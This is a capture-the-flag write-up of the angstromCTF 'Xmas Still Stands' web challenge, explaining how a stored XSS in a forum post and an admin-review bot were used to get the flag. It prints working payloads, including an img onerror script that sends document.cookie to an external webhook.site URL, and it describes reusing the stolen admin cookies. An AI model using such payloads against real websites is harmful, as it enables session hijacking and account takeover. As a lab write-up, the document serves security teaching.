## Xmas Still Stands 

* **Category:** web
* **Points:** 
* **Author(s):** b0uldrr

---

### Challenge
```
You remember when I said I dropped clam's tables? Well that was on Xmas day. And because I ruined his Xmas, he created the Anti Xmas Warriors to try to ruin everybody's Xmas. Despite his best efforts, Xmas Still Stands. But, he did manage to get a flag and put it on his site. Can you get it?

Author: aplet123

https://xmas.2020.chall.actf.co/

```

---

### Solution
The challenge website has 4 pages: Home, Post, Report and Admin. Visting the _Admin_ page tells us that the site has replaced a traditional login form with a super secret cookie that authorises admin access. So to gain access to this website our challenge is to steal an admin cookie. The name of the challenge is an obvious reference to an _XSS_ attack, so let's try that. 

The _Post_ page provides an input form to submit a forum post. Upon hitting the submit button, we're provded with a link to a page with the new post displayed. I submitted a post of `normal <h1>heading</h1>` and reviewing the output, the text in the heading tags was much bigger, so we know that some HTML tags may not be sanitised. Next I tried a payload of `<script>alert("test");</script>` but this did not prompt an alert box. Finally, I tried `<img src=1 onerror="(function(e){alert("test");})(this)" />` and this _did_ prompt an alert box, so now we have a way of injecting code.

This payload works by trying to display an image with a nonsense source (such as "1") and when it inevitably fails to load, it calls the onerror function - which we write to an anonymous and immediately invoked function. We can write this function to grab the cookies of anyone visiting the page and send them to a webserver that we control.

I setup a webhook logging site at [webhook.site](webhook.site) and then, back at the challenge website, I posted the following payload with the details of my webhook site:

```
<img src=1 onerror="(function(e){var x=new XMLHttpRequest(); x.open('GET','https://webhook.site/42462b28-7115-4bc1-b5b7-edee3eabc155?'+document.cookie,true); x.send();})(this)"/>
```

![submitted](images/submitted_payload.png)

Visiting the page, we can see that the image doesn't load and so it will call our onerror function.

![error](images/image_error.png)

Now we just an admin to visit the page so we can steal their cookies. I went to the _Report_ page and entered the URL of my malicious post so that an admin would visit the page to review it.

![report](images/report.png) 

I then went back to webhook.site and waited to see if any cookies were intercepted. After a few minutes I had a hit.

![webhook](images/webhook.png)

We received 2 cookies:
- super_secret_admin_cookie=hello_yes_i_am_admin
- admin_name=Juan

I manually entered those cookie values into my browser and then visited the _Admin_ page, which displayed the flag.

![flag](images/flag.png)

---

### Flag
```
actf{s4n1tize_y0ur_html_4nd_y0ur_h4nds}
```
